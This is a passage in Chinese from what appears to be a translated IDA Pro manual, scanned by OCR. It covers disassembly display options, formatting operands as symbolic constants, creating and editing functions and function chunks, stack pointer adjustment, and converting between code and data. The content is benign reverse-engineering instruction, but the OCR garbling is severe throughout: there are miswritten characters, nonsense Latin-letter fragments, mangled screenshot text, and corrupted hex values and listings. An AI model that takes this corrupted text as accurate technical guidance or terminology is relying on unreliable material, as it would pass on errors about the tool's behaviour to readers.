原始 值 (相对 变化 为 0 字 节 ) 任何 时 候 ， 如 果 IDA 遇 到 一 个 函数 返回 语句 ， 并 检测 到 栈 指 
针 的 值 不 为 0， 这 时 ，IDA 将 标注 一 个 错误 条 件 ， 并 将 相关 指令 以 红色 显示 。 有 时 候 ， 这 
样 做 可 能 是 有 意 阻 挠 自动 分 析 。 其 他 情况 下 , 这 可 能 是 由 于 编译 需 使 用 了 IDA 无 法 准确 分 
析 的 “序言 ”和 “尾声 ”代码 。 

口 Comments (注释 ) 和 Repeatable comments (可 重复 注释 )。 取 消 任何 一 个 选项 ，IDA 
将 不 会 显示 相应 类 型 的 注释 。 如 果 你 希望 梳理 一 个 反 汇 编 代码 清单 ， 这 些 选项 可 能 有 用 。 

O Auto comments 〈 自 动 注释 )。IDA 可 能 会 为 某 些 指令 类 型 月 动 添加 注释 。 这 种 注释 可 以 
作为 一 种 提醒 ， 以 帮助 用 户 了 解 特殊 指令 的 行为 。IDA 不 会 为 x86 mov 等 简单 的 指令 添加 
注释 。@ 处 的 注释 即 为 目 动 注释 。 用 户 注 释 优先 于 目 动 注释 。 因 此 ， 如 采 硕 望 看 到 IDA 为 
某 一 行 添 加 的 日 动 注释 ， 你 必须 删除 你 添加 的 任何 注释 〈 币 规 注 释 或 可 重复 注释 )。 

O Bad instructions «BAD» marks 〈 无 效 指令 <BAD> 标 记 )。IDA 可 以 标记 出 处 理 硕 认为 合法 ， 
但 一 些 汇编 右 可 能 无 法 识别 的 指令 。 未 记 入 文档 的 CPU 指令 而 非 非法 指令 ) 即 属 此 类 。 
这 时 ,IDA 会 将 这 种 指令 作为 一 个 数据 字 节 序列 进行 反 汇 编 , 并 将 未 记 入 文档 的 指令 显示 
为 一 段 以 <BAD> 开 头 的 注释 。 这 样 做 的 目的 是 生成 大 多 数 汇 编程 序 都 可 以 处 理 的 反 汇 编 代 
人 码 。 请 参阅 IDA 帮 助 文档 了 解 使 用 <BAD> 标 记 的 更 多 详情 。 

Q Numbers of opcode bytes (操作 码 字 节 数 )。 大 多 数 反 汇编 各 都 能够 生成 列表 文件 ， 逐个 
显示 生成 的 机 需 语 言 字 节 ,， 以 及 它们 相应 的 汇编 语言 指令 。IDA 文 持 将 一 个 十 六 进 制 窗口 
与 反 汇 编 代 人 码 清单 窗口 同步 ,查看 与 每 一 个 指令 有 关 的 机 融 博 言 字 和 。 你 可 以 指定 IDA 应 
为 每 个 指令 显示 的 机 需 语 言 字 节 的 数量 ， 选 择 性 地 查看 与 汇编 声言 指令 混杂 在 一 起 的 机 
AB HX Ho 
如 果 你 正在 反 汇 编 的 是 指令 大 小 固定 的 处 理 噩 的 代码 ， 那 么 ， 这 个 问题 就 相当 人 简单。 但 
是 ， 对 于 x86 等 指令 长 度 可 变 ， 其 指令 大 小 从 1 字 节 到 十 几 字 节 不 等 的 处 理 需 来 说 ， 情 况 
就 变 得 复杂 了 。 不 管 指令 多 长 , IDA 都 会 在 反 汇 编 代 码 清单 中 为 你 在 这 里 指定 的 字 节 数 预 
留 显示 空间 ， 而 将 反 汇 编 代码 行 的 璋 余部 分 移 癌 右边 ， 从 而 为 你 指定 的 操作 码 字 市 数 提 
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供 空 间 。 在 下 面 的 代码 中 ， 操 作 码 字 节 数 设 置 为 9， 目 下 面 的 一 列 即 说 明了 这 一 点 。@ 处 
的 + 号 表示 : 根据 当前 设置 ， 该 位 置 的 指令 过 长 ， 因 而 无 法 完整 显示 。 


d e 

000 55 push ebp 

004 89 E5 mov ebp, esp 

004 83 EC 78 sub esp, 78h 0; Integer Subtraction 

07C 8B 45 10 mov eax, [ebp«arg 8] 

07C 89 45 F4 mov [ebp+var C], eax 

07C 8B 45 OC mov eax, [ebp«arg 4] 

07C 89 45 M mov [ebp+var 5C], eax 

07C C7 45 A0 OA O00* mov [ebp+var 60], OAh 

07C C6 45 A8 41 mov [ebp+var 58], 41h 

07C 8B 45 A4 mov eax, [ebp+var 5C] 

07C 89 44 24 04 mov [esp+4], eax 

07C 8B 45 AO mov eax, |ebp+var_60] 

07C 89 04 24 mov [esp], eax 

07C E8 91 FF FF FF call bar @; Call Procedure 

07C C9 leave 0; High Level Procedure Exit 
000 C3 retn O; Return Near from Procedure 





你 还 可 以 通过 调整 图 7-4 右 下 角 的 缩 进 值 和 边 距 ， 进 一 步 目 定义 反 汇 编 窗 口 。 这 些 选 项 的 任 
何 变 化 部 只 影响 当前 数据 库 。 这 些 选 项 的 全 局 设置 保存 在 主要 配置 义 件 <IDADIR>/cfg.ida.cfg 中 。 


7.3.2 格式 化 指令 操作 效 


在 反 汇 编 过 程 中 ，IDA 会 做 出 许多 决定 ， 确 定 如 何 格式 化 与 每 条 指令 有 关 的 操作 数 。 通 第 ， 
它 做 出 的 最 重要 决定 是 ， 如 何 格式 化 由 各 种 指令 使 用 的 各 种 整数 音量 。 除 其 他 内 容 外 ,这些 稼 量 
可 表示 跳 转 或 调用 指令 中 的 相对 佣 移 量 、 全 局 变量 的 绝对 地 址 、 用 在 算术 运算 中 的 值 或 者 程序 员 
定义 的 常量 。 为 了 使 反 汇 编 代码 更 具 可 读 性 ，IDA 尽 可 能 地 使 用 符号 名 称 ， 而 非 数 字 。 有 了 时候， 
IDA 根 据 被 反 汇编 的 指令 ( 如 调用 指令 ) 的 上 下 文 做 出 格式 化 决定 ; 其 他 情况 下 ， 则 根据 所 使 用 
的 数据 ( 如 访问 的 全 局 变量 或 栈 帧 中 的 侦 移 量 ) 做 出 格式 化 决定 。 别 的 许多 情况 下 ,常量 的 具体 
使 用 情形 可 能 并 不 十 分 清楚 ， 这 时 ，IDA 一 般 会 将 相关 稼 量 格式 化 成 一 个 十 六 进 制 常量 。 

如 打 你 碰 马 是 少数 精通 十 六 进 制 的 人 中 的 一 个 ,那么 ， 你 会 非 稼 喜爱 IDA 的 操作 数 格式 化 功 
能 。 右 击 反 汇编 和 窗口 中 的 任何 第 量 ， 打 开 如 图 7-5 所 示 的 上 下 文 亲 单 。 

















dE oak 
































mov [ebp+var 60], OAh 
mov [ebprvar 58], 41h 
mov eax, [ebp-*y] *» Jump to operand Enter 
mov [esp+78h+var 74], La Jump in a new window Alt4Enter 
mov eax, [ebp+var 60] i ` 
mov [esp+78h+var 78], Wi Jump in a new hex window 
call sub 401050 ig Xrefs from 
leave P1] Use standard symbolic constant 
retn 三 
endp fia] 65 H 
^s] 1010 
L SUBROUTINE —[*]100001b B 
ES R 








图 7-$ ”常量 格式 化 选项 
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在 上 图 中 ， 菜单 提供 的 选项 可 将 常量 (41h ) 重新 格式 化 成 十 进 制 、 八 进 制 或 二 进 制 值 。 由 
于 这 个 例子 中 的 向 量 属 于 ASCI 可 打印 总 量 ， 菜 单 中 还 提供 了 一 个 选项 ， 可 将 该 常量 格式 化 成 一 
个 字符 销量 。 无 论 什 么 时 候 ， 只 要 你 选择 了 一 个 特殊 的 选项 ,菜单 将 显示 可 用 于 替代 操作 数 文本 
的 具体 文本 。 

许多 时 候 ， 程 序 员 在 他 们 的 源 代 码 中 使 用 已 命名 的 和 常量。 这 些 常量 可 能 是 使 用 了 #define 语 
^i] (或 其 等 效 语句 ) 的 结果 ,也 可 能 属于 一 组 枚 举 常 量 。 遗 憾 的 是 ， 如 果 编 译 需 已 经 完成 对 源 代 
码 的 编译 ， 它 就 不 再 可 能 确定 源 代 码 使 用 的 是 符号 常量 、 文 字 常 量 还 是 数字 常量 。IDA 维 护 着 大 
量 与 许多 常见 库 ( 如 C 标 准 库 或 Windows APT) 有 关 的 已 命名 的 常量 ， 用 户 可 以 通过 常量 值 的 上 
下 文 菜单 中 的 Use standard symbolic constant ( 使 用 标准 符号 常量 ) 选项 来 访问 这 些 和 常量 。 在 图 7-5 
中 ， 对 常量 0AH 选 择 这 个 选项 ， 将 打开 如 图 7-6 所 示 的 符号 选择 对 话 框 。 


t Please choose a symbol - | 口 | x] 
Type name Dedaration 


i3 ADSTYPE LARGE INTEGER UOOOUOOA Visual C++ v6 













































| a ADS FORMAT. PROVIDER 00000004 Visual C++ v6 
| Ña ADS SEARZHPREF SORT. ON 00000000A visual C++ up 
(a AFTP_LVL_FAILURES 00000000A Visual C++ v6 
(a arm PASSWORD. SIZE 0000000A Visual C++ v6 
| a AFTP. RC PROGRAM INTERNAL ERROR D000000A Visual C++ v6 
(ba arm LUISERID SIZE 0000000A Visual C++ v6 
ba AFTP. VsM 0000000A Visual C++ v6 
(ba AF ccm 00000004 Visual C++ v6 
(a ae SID sKIPJACK 0000000A Visual C++ v6 





| dy ALPHA. FP. CONVERT 00OO000A Visual C++ v6 
(a ap SEND PENDING STATE 0000000A Visual C++ v6 Ll 
+| 
Cancel | Search | Help | 


Line 41 of 346 E 





图 7-6 ”符号 选择 对 话 框 


根据 我 们 尝试 格式 化 的 常量 值 进 行 过 滤 后 ， 这 个 对 话 框 中 的 常量 从 IDA 的 内 部 常量 列表 导 
入 。 在 这 个 例子 中 , 我 们 看 到 的 是 所 有 IDA 认 为 与 0AH 相 等 的 常量 。 如 果 我 们 确定 在 创建 一 个 X.25 
类 型 的 网 络 连 接 过 程 中 使 用 了 该 值 ， 那 么 ， 我 们 就 可 以 选择 AF CCITT， 并 最 终 得 到 下 面 的 反 汇 
编 行 : 











. text :004010A2 mov [ebp+var 60], AF CCITT 


标准 常量 列表 非常 有 用 , np RIT GEAR PEPRBU T6 5e 43— 1T C AB MH OS, 使 我 们 免 
于 在 API 文 档 中 搜索 次 在 的 匹配 项 ， 从 而 帮助 我 们 市 省 大 量 时 间 。 











7.3.3. ”操纵 函数 


在 初步 的 目 动 分 析 完 成 之 后 ， 出 于 许多 原因 ， 你 可 能 希望 操纵 函数 。 例 如 ，IDA 无 法 定位 一 
个 函数 调用 ， 由 于 没有 直接 的 方法 到 达 函 数 ，IDA 将 无 法 识别 它们 。 另 外 ，IDA 可 能 无 法 正确 确 
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定 冰 数 的 结束 部 分 ， 需 要 你 手动 干预 ， 以 更 正 反 汇编 代码 中 的 错误 。 此 外 ， 如 果 编 译 需 已 经 将 果 
数 分 割 到 几 个 地 址 范围 ， 或 者 在 优化 代码 的 过 程 中 ， 编 译 需 为 节省 空间 , 将 两 个 或 几 个 函数 的 共 
同 结束 序列 合并 在 一 起 ， 这 时 ，IDA 同 样 无 法 确定 函数 的 结束 部 分 。 

1. 新 建 函 数 

在 某 些 情况 下 , 你 可 能 需要 在 没有 哨 数 的 地 方 创建 新 函数 。 新 函数 可 以 由 已 经 不 属于 某 个 也 
数 的 现 有 指令 创建 ， 或 者 由 尚未 被 IDA 以 任何 其 他 方式 定义 ( 如 双 字 或 字符 串 ) 的 原始 数据 字 节 
创建 。 将 光标 放 在 将 要 包含 在 新 函数 中 的 第 一 个 字 市 或 指令 上 , 然后 选择 Edit » Functions » Create 
Function， 即 可 创建 一 个 新 函数 。 在 必要 时 ，IDA 会 将 数据 转换 成 代码 。 接 下 来 ， 它 会 癌 前 扫描 ， 
分 析 函 数 的 结构 ， 并 搜索 返回 语句 。 如 果 IDA 能 够 找到 正确 的 函数 结束 部 分 ， 它 将 生成 一 个 新 的 
PAX. abr. 并 以 函数 的 形式 重组 代码 。 如 有 果 它 无 法 找到 函数 的 结束 部 分 , 或 者 发 现任 何 
非法 指令 ， 则 这 个 操作 将 以 失败 告终 。 

2. 删除 函数 

你 可 以 使 用 Edit » Functions » Delete Function 命 令 删 除 现 有 图 数 。 如 果 你 认为 IDA 的 上 自动 分 析 
出 现 错误 ， 你 可 能 希望 删除 一 个 消 数 。 

3. 函数 块 

在 由 Microsoft Visual C++ 编译 需 生 成 的 代码 中 ， 经 浓 可 以 找到 师 数 块 。 编 译 天 移动 不 稼 
执行 的 代码 段 ， 用 以 将 经 常 执行 的 代码 段 “ 挤 入 ”不 大 可 能 被 换 出 的 内 存 页 ， 由 此 便 产 生 了 
SCH. 

OD reell bh Erd ak Anel. DAAM Ra a Tote rou Mk, 4 hrbir H CG 
H. BL, IDARE REIMA USB, HERRAR HARE TE. "mF Term 
bull iif R3 rn : 
































.text:004037AE ChunkedFunc proc near 
. text :004037AE 
.text:004037AE var 420 
.text:004037AE var 41C 
.text:004037AE var 4 
.text:004037AE hinstDLL 
.text:004037AE fdwReason 
.text:004037AE lpReserved 
. text :004037AE 
.text:004037AE ; FUNCTION CHUNK AT 6..text:004040D7 SIZE 00000011 BYTES 
.text:004037AE ; FUNCTION CHUNK AT .text:004129ED SIZE 0000000A BYTES 
.text:004037AE ; FUNCTION CHUNK AT .text:00413DBC SIZE 00000019 BYTES 
.text :004037AE 

. text :004037AE push ebp 

. text :004037AF mov ebp, esp 


dword ptr -420h 
dword ptr -41Ch 
dword ptr -4 
dword ptr 8 
dword ptr oCh 
dword ptr 10h 


通过 双击 与 函数 块 关 联 的 地 址 ( 如 @ 人 处 ), 可 迅速 到 达 该 冰 数 块 。 在 反 汇 编 代 码 清 单 中 ，IDA 
通过 界定 其 指令 范围 的 注释 和 涉及 其 所 属 函 数 的 注释 来 资 明 函 数 岂 ， 如 下 所 示 : 
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.text:004040D7 ; START OF FUNCTION CHUNK FOR ChunkedFunc 
. text :004040D7 


.text:004040D7 loc 0040COD7: ; CODE XREF: ChunkedFunc+72 个 ] 
. text : 004040D7 dec eax 

. text : 004040D8 jnz loc 403836 

. text : 004040DE call sub 4040ED 

. text : 004040E3 jmp loc 403836 


.text:004040E3 ; END OF FUNCTION CHUNK FOR ChunkedFunc 


有 了 时候 ，IDA 可 能 无 法 确定 与 函数 关联 的 每 一 个 块 ， 或 者 函数 可 能 锌 错误 地 识别 成 函数 块 ， 
而 非 函 数 本 身 。 在 这 种 情况 下 ， 你 需要 创建 自己 的 函数 块 ， 或 删除 现 有 的 函数 块 。 

要 创建 新 的 函数 块 ， 首 先 要 选择 属于 该 块 的 地 址 范围 (不 得 属于 现 有 的 任何 函数 )， 并 选择 
Edit > Functions » Append Function Tail 命 令 。 这 时 , IDA 会 要 求 你 从 所 有 已 定义 的 函数 列表 中 选择 
TVA PRAEC AC PLC 








wA DDO0000000000000000000mDAOO0D000000000D00D00000 
[] function tail[ [|] 





要 删除 现 有 的 函数 块 ， 将 光标 放 在 要 删除 的 块 中 的 任何 一 行 上 ， 然 后 选择 Edit » Functions ， 
Remove Function Tail 即 可 。 这 时 ，IDA 会 要 求 你 在 删除 选中 的 块 之 前 确认 该 项 操作 。 

如 果 隐 数 块 只 会 造成 更 多 麻烦 ， 你 可 以 在 初次 将 文件 加 载 到 IDA 时 ， 取 消 选 择 Create function tails 
加 载 磅 选项， 要 求 IDA 不 要 创建 汝 数 块 。 这 个 选项 是 一 个 加 载 带 选项 ， 可 通过 最 初 的 文件 加 载 对 话 
框 中 的 Kernel Options( 核心 选项 ， 参 见 第 4 章 ) 访问 。 如 果 禁 用 了 少数 尾 ， 你 看 到 的 主要 不 同 是 ， 
已 经 包含 函数 尾 的 函数 将 包含 指 问 函 数 边 界 以 外 区 域 的 跳 转 。 IDA 会 在 反 汇 编 代 人 码 清单 左 侧 的 骨头 
窗口 中 用 红线 和 生 头 突出 显示 这 些 跳 转 。 在 对 应 函数 的 图 形 视 图 中 ， 这 些 跳 转 的 目标 并 不 显示 。 

4. 函数 特性 

IDA 为 它 识 别 的 每 一 个 函数 提供 许多 特性 ,如 图 7-7 所 示 的 函数 属性 对 话 框 可 用 于 编辑 其 中 的 
某 些 特性 。 下 面 说 明 每 一 个 可 修改 的 属性 。 

[I 3x 


Name of function | demo_stackframe a | 
start address | ,text:00401090 ”| 








































End address | .text:004010c1 | | Does not return 
Color DEFAULT | [ Far function 

[ Library func 
Enter size of (in bytes) [ Static func 
Local variables area 0x78 v [v BP based frame 
Saved registers 0x4 v [ BP equals to SP 
Purged bytes 0x0 m 
Frame pointer deta [oxo ` zl 


[ o | c | e | 


图 7-7 KEXI E 
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口 RAZE. DEDE) BUB PURUS TRISTE s 

OQ riitit, KA Pae 386, IDAS EA EUER P, BUR DES Glen 
使 用 的 地 址 ， 自 动 识别 这 个 地 址 。 

OQ 结束 地 址 。 函 数 中 最 后 一 条 指令 之 后 的 地 址 。 通 常 ， 它 是 国 数 的 返回 语句 之 后 的 指令 的 
地 址 ,多 数 情 况 下 , IDA 会 在 分 析 阶 段 或 在 创建 函数 的 过 程 中 自动 识别 这 个 地 址 ,如 果 IDA 
无 法 正确 定位 一 个 函数 的 结束 部 分 ， 你 就 需要 手动 编辑 这 个 值 。 记 住 ， 这 个 地 址 并 不 是 
痕 数 的 一 部 分 ， 而 是 函数 的 最 后 一 条 指令 之 后 的 地 址 。 

口 局 部 变量 区 。 拯 数 的 局 部 变量 ( 见 图 6-4 ) 专用 的 栈 字 节 数 。 多 数 情况 下 ，IDA 会 通过 分 
析 消 数 的 栈 指 针 的 行为 ， 目 动 计算 出 这 个 值 。 

口 保存 的 寄存 器 。 为 调用 方 保存 寄存 絮 ( 见 图 6-4 ) 所 使 用 的 字 节 数 。IDA 认 为 保存 的 寄存 
带 区 域 放 在 保存 的 返回 地 址 顶部、 与 函数 有 关 的 所有 局 部 变量 的 下 方 。 一 些 编译 带 选 择 
将 寄存 希 保 存在 图 数 局 部 变量 的 顶部 。IDA 认 为 保存 这 些 寄 存 硕 所 使 用 的 空间 属于 局 部 变 
量 区 域 ， 而 非 保存 的 寄存 融 区 域 。 

口 已 删除 字 节 。 已 删除 字 节 表示 当 函 数 返 回调 用 方 时 ，IDA 从 栈 中 删除 的 参数 的 字 节 数 。 对 
cdec1 函 数 而 言 ， 这 个 值 始终 为 0。 对 stdcal1 函 数 来 说 ， 这 个 值 表示 传递 到 栈 上 的 所 有 参 
数 ( 见 图 6-4 ) 占用 的 空间 。 在 x86 程 序 中 ， 如 果 IDA 观 察 到 程序 使 用 了 返回 指令 的 RET N 
变 体 ， 它 将 自动 确定 这 个 值 。 

OQ 帧 指针 增 量 。 有 了 时候 ， 编 译 器 可 能 会 对 函数 的 帧 指针 进行 调整 ， 使 其 指 癌 局 部 变量 区 域 
的 中 间 ， 而 不 是 指 回 保存 在 局 部 变量 区 域 底部 的 帧 指针 。 调 整 后 的 帧 指针 到 保存 的 帧 指 
针 之 间 的 这 段 距 离 叫 做 帧 指针 增 量 ( frame pointer delta ) Za F, IDAZTEA TERZA 
的 过 程 中 自动 计算 出 帧 指针 增 量 。 编 译 融 利用 栈 帧 增 量 进 行 速度 优化 。 使 用 增 量 的 目的 ， 
是 在 离 帧 指针 1 字 节 (市 符号 ) DIN C-128--127) 内 保存 尽 可 能 多 的 栈 帧 变量 。 

还 有 为 外 一 些 特性 复 选 框 可 用 于 设置 函数 的 特性 。 与 对 话 框 中 的 其 他 选项 一 样 , 这 些 复 选 框 

通常 反映 的 是 IDA 目 动 分 析 得 到 的 结果 。 以 下 是 这 些 可 启用 也 可 禁用 的 属性 。 

O 不 返回 。 困 数 不 返回 到 它 的 调用 方 。 如 果 调 用 这 样 的 图 数 ,在 相关 的 调用 指令 之 后 ，IDA 
认为 图 数 不 会 继续 执行 。 

OQ 远 函 数 。 这 个 属性 用 于 在 分 段 体系 结构 上 将 一 个 孔 数 标记 为 远 子 数 。 在 调用 该 也 数 时 ， 
中 数 的 调用 方 需要 指定 一 个 段 和 一 个 偏 移 值 。 通 常 ， 是 否 使 用 远 调 用 ， 应 由 程序 中 使 用 
的 内 存 模式 决定 ， 而 不 是 由 体系 结构 支持 分 段 | 例如， 在 x86 体 系 结 构 上 使 用 了 大 内 存 模 
式 ( 相对 于 平 内 存 模 式 )] 决定 。 

D 库 函 数 。 这 个 属性 将 一 个 函数 标记 为 库 代 码 。 库 代码 可 能 包括 静态 链接 库 中 的 编译 各 或 
尊 数 所 包含 的 文 持 例 程 。 将 一 个 函数 标记 为 库 义 数 后 ， 该 函数 将 以 分 配给 库 孔 数 的 颜色 
显示 ， 从 而 与 非 库 代 人 码 区 分 开 来 。 

O 静态 函数 。 除 在 函数 的 特性 列表 中 显示 静态 修饰 从 处， 其 他 什么 也 不 做 。 

O 基于 BP 的 帧 。 这 个 特性 表示 函数 利用 了 一 个 帧 指针 。 多 数 情 况 下 ， 你 可 以 通过 分 析 吧 数 
的 “序言 ”来 自动 确定 这 一 点 。 但 是 ， 如 果 通 过 分 析 无 法 确定 给 定 的 函数 是 否 使 用 了 帧 
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指针 ， 就 可 以 手动 选择 这 个 特性 。 如 果 你 手动 选择 了 这 个 特性 ， 一 定 要 相应 地 调整 保存 
的 寄存 需 的 大 小 (通常 指 根据 保存 的 帧 指针 的 大 小 增 大 ) 和 局 部 变量 的 大 小 (通常 指 根 
据 保 存 的 帧 指针 的 大 小 减少 ) 对 基于 帧 指针 的 帧 而 言 , 使 用 帧 指针 的 内 存 引 用 被 格式 化 ， 
以 利用 符号 栈 变 量 名 称 ， 而 非 数 字 偏 移 量 。 如 果 没 有 设置 这 个 特性 ， 则 认为 栈 帧 引用 与 
栈 指针 寄存 项 有 天。 
O BP 等 于 SP。 一 些 函 数 将 帆 指 针 配 置 为 在 进入 一 个 函数 时 指 问 栈 帆 ( 以 及 栈 指针 ) 的 顶端 。 
在 这 种 情况 下 ， 就 应 设置 该 属性 。 基 本 上 ， 它 的 作用 等 同 于 将 帧 指针 增 量 的 大 小 设置 为 
等 于 局 部 变量 区 域 。 
5. 栈 指针 调整 
如 前 所 述 ，IDA 会 尽 其 所 能 跟踪 函数 内 每 一 条 指令 上 的 栈 指针 的 变化 。IDA 跟 踪 这 种 变化 的 
准确 程度 ， 在 很 大 程度 上 影响 关子 数 的 栈 帧 布局 的 准确 程度 。 如 果 IDA 无 法 确定 一 条 指令 是 否 
改 了 栈 指 针 ， 你 就 需要 手动 调整 栈 指针 。 
如 果 一 个 函数 调用 了 另 一 个 使 用 stdcal1 调 用 约定 的 函数 ， 就 会 出 现 上 述 情况 ， 这 是 最 简单 
的 一 种 情况 。 如 果 被 调用 的 函数 位 于 IDA 无 法 识别 的 共享 库 中 (DATE TT Z 86 HE eg Sin 
名 和 调用 约定 有 关 的 信息 )， 那 么 ，IDA 并 不 知道 该 函数 使 用 了 stdcall 调 用 约定 ， 也 就 无 法 认识 
到 : 被 调用 的 孔 数 会 将 栈 指针 修改 后 返回 。 因 此 ，IDA 会 为 函数 的 剩余 部 分 提供 一 个 错误 的 栈 指 
针 值 。 在 下 面 的 函数 调用 中 ，some imported func 即 位 于 共享 库 中 ， 这 正好 说 明了 上 述 问 题 ( 注 
意 ,“ 栈 指针 行 部 分 ”选项 已 被 选中 ): 
































.text:004010EB 01C push eax 
.text:004010F3 020 push 2 
.text:004010FB 024 push 1 

O  .text:00401102 028 call some imported func 
.text:00401107 69028 mov ebx, eax 


H Tsome imported func 使 用 的 是 stdcal1 调 用 约定 ， 在 返回 时 ， 它 清除 了 栈 中 的 3 个 参数 ， 
@ 处 的 正确 栈 指针 值 应 为 015。 修 正 这 个 问题 的 一 种 方法 ， 是 对 @@ 处 的 指令 进行 手动 栈 调整 。 要 
进行 栈 调 整 ， 首 先 应 选中 进行 调整 的 地 址 ， 并 选择 Edit » Functions * Change Stack Pointer ( 热 键 
为 ALT+K )， 然 后 指定 栈 指针 更 改 的 字 市 数 ， 在 本 例 中 为 12。 

虽然 剖面 的 例子 能 够 解决 这 个 问题 ， 但 这 个 特殊 问题 还 有 一 个 更 好 的 解决 办 法 。 假 如 
some imported func 被 调用 了 许多 次 ， 那 该 怎么 办 呢 ?” 这 时 ， 我 们 需要 在 some imported func? 
调用 的 每 一 个 位 置 进行 上 述 栈 调整 。 很 明显 ， 这 是 一 个 非 背 党 琐 的 任务 ， 很 容易 出 钳 。 那 么 , 我 
们 最 好 是 让 IDA 了 解 Some_imported_ func 的 行为 。 因 为 我 们 处 理 的 是 一 个 导入 的 丽 数 ， 如 采 我 们 
尝试 导航 到 该 函数 ， 我 们 将 最 终 导 航 到 该 函数 的 导入 表 条 目 ， 如 下 所 示 : 

.idata:00418078  ; Segment type: Externs 


.idata:00418078  ; idata 
.idata:00418078 extrn some imported func:dword ; DATA XREF: sub 401034/^r 























尽管 这 是 一 个 导入 的 函数 , 你 也 可 以 编辑 有 关 其 行为 的 一 条 信息 : 与 该 函数 有 关 的 已 删除 学 
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节 的 数量 。 通 过 编辑 这 个 图 数 ， 你 可 以 指定 它 在 返回 时 从 栈 中 删除 的 字 节 数 ，IDA 将 会 “ 打 散 ” 
这 一 信息 ， 将 其 应 用 于 调用 该 函数 的 每 一 个 位 置 ， 立 即 纠正 每 个 位 置 的 栈 指针 计算 错误 。 

为 了 改进 日 动 分 析 ，IDA 融 入 了 一 些 高 级 技术 ， 通 过 一 个 与 栈 指针 行为 有 关 的 线性 方程 系统 
来 解决 栈 指针 错误 问题 。 因 此 ， 我 们 可 能 根本 不 会 意识 到 ，IDA 之 前 并 不 了 解 诸 如 some | 
imported func 之 类 的 本 数 的 详细 信息 。 欲 了解 有 关 这 些 技术 的 更 多 信息 , 请 参阅 lfak 的 博客 标题 
为 “Simplex method in IDA Pro” 的 文章 ， 地 址 为 http:/hexblog.com/2006/06/。 


7.3.4 ”数据 与 代码 互相 转换 

在 自动 分 析 阶 段 , 字 节 有 时 可 能 被 错误 地 归 类 。 数 据 字 节 可 能 被 错误 地 归 类 为 代码 字 节 , 并 被 
反 汇 编 成 指令 ; 而 代码 字 节 可 能 被 错误 地 归 类 为 数据 字 节 , 并 被 格式 化 成 数据 值 。 有 许多 原因 会 导 
致 这 类 情况 , 如 一 些 编译 需 将 数据 通信 在 程序 的 代码 部 分 , 或 者 一 些 代码 字 市 从 未 被 作为 代码 直接 
引用 ， 因 而 IDA 选 择 不 对 它们 反 汇 编 。 模 糊 程序 则 特别 容易 模糊 代码 部 分 与 数据 部 分 之 间 的 区 别 。 

无 论 你 出 于 什么 原因 希望 对 反 汇 编 代码 重新 格式 化 ,这 个 过 程 都 相当 简单 ,在 重新 格式 化 之 前 ， 
首先 必须 删除 其 当前 的 格式 (代码 或 数据 )。 庙 击 你 希望 取消 定义 的 项 目 ， 在 结果 上 下 文 荣 单 中 选 
择 Undefine ( 也 可 使 用 Edit 》 Undefine 命 令 或 热 键 U )， 即 可 取消 函数 、 代 码 或 数据 的 定义 。 取 消 某 
个 项 目的 定义 后 ,其 基础 字 节 将 作为 原始 字 节 值 重 新 格式 化 。 在 执行 取消 定义 操作 之 前 , 使 用 “ 单 
击 并 拖 动 ”操作 选择 一 个 地 址 范围 ， 可 以 取消 大 范围 内 的 定义 。 下 面 以 一 个 简单 的 函数 为 例 : 



































.text:004013E0 sub 4013E0 proc near 
.text:004013E0 push ebp 
.text:004013E1 mov ebp, esp 
. text : 004013E3 pop ebp 

. text :004013E4 retn 
.text:004013EA4 sub 4013EO0 endp 


取消 这 个 函数 的 定义 将 得 到 下 面 这 些 未 分 类 的 子 市 ,我们 几乎 可 以 以 任何 方式 重新 对 它们 进 
行 格式 化 : 


.text:004013E0 unk 4013E0 db 55h ; U 
.text:004013E1 db 89h ; ë 
. text : 004013E2 db oE5h ; s 
. text : 004013E3 db 5Dh ; | 
. text :004013E4 db oC3h ; + 











HIN — HARE LB 8 , 右 击 其 中 的 第 一 个 字 市 , CTF Cam EC ode ( 也 可 使 用 
Edit » Code 或 热 键 C )。 这样 ，IDA 将 开始 反 汇编 所 有 子 市 ， 和 直到 它 过 到 一 个 已 定义 的 项 目 或 非法 
引信 。 在 执行 代码 转换 操作 之 前 ， 使 用 “ 单 击 并 拖 动 ”操作 选择 一 个 地 址 范围 ， 可 以 进行 大 范围 
代码 转换 操作 。 

将 代码 转换 为 数据 的 逆 回 操作 要 复杂 一 些 。 首 先 ， 使 用 上 下 文 荣 单 不 可 能 将 代码 转换 为 数据 。 
你 可 以 通过 Edit > Data 和 热 键 D 来 完成 。 要 想 将 指令 批量 转换 为 数据 ， 最 简单 的 方法 是 取消 你 希望 
转换 为 数据 的 所 有 指令 的 定义 ,然后 对 数据 进行 相应 的 格式 化 .基本 的 数据 格式 化 将 在 下 一 人 讨论。 
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7.4 基本 数据 转换 


在 了 解 程序 行为 的 过 程 中 ,格式 正确 的 数据 可 能 和 格式 正确 的 代码 一 样 重要 。IDA 会 收集 不 
同 来 源 的 信息 ,并 使 用 许多 算法 来 决定 对 反 汇 编 代码 清单 中 的 数据 进行 格式 化 的 最 住 方法 。 下面 
的 一 些 例子 说 明了 IDA 如 何 选 择 数 据 格 式 。 

(1) 通过 了 解 寄存 器 的 使 用 方式 ， 可 以 推断 出 数据 类 型 和 大 小 。 如 果 一 条 指令 从 内 存 加 载 了 
一 个 32 位 寄存 硕 ， 我 们 可 以 据 此 推 朵 ， 相 关内 存 位 置 保 存 有 一 个 4 字 世 的 数据 类 型 “虽然 我 们 无 
法 判断 其 到 底 是 一 个 4 字 节 整数 ， 还 是 一 个 4 字 节 指针 )。 

(2) 函数 原型 可 用 于 为 函数 参数 分 配 数 据 类 型 。 为 此 ，IDA 维 护 着 一 个 庞大 的 函数 原型 库 。 
我 们 可 以 对 传递 给 函数 的 参数 进行 分 析 ， 尝试 将 一 个 参数 与 某 个 内 存 位 置 关 联 起 来 。 如 果 可 以 确 
定 这 种 关系 ,就 可 以 对 相关 内 存 位 置 应 用 一 种 数据 类 型 。 以 一 个 因数 为 例 , 该 另 数 仪 有 的 参数 是 
一 个 指 加 CRITICAL _ SECTION 一 种 Windows API 数 据 类 型 ) 的 指针 。 如 有 果 IDA 能 够 确定 调用 这 个 郴 
数 时 传递 的 地 址 ， 它 就 可 以 将 这 个 地 址 标记 为 CRITICAL SECTION 对 象 。 

(3) 分 析 字 节 序 列 可 以 知道 可 能 的 数据 类 型 。 扫 摘 二 进 制 文件 以 从 中 查找 字符 串 内 容 即 是 如 
此 。 如 果 发 现 较 长 的 ASCI 字 符 序 列 ， 即 可 认为 它们 属于 字符 数组 。 

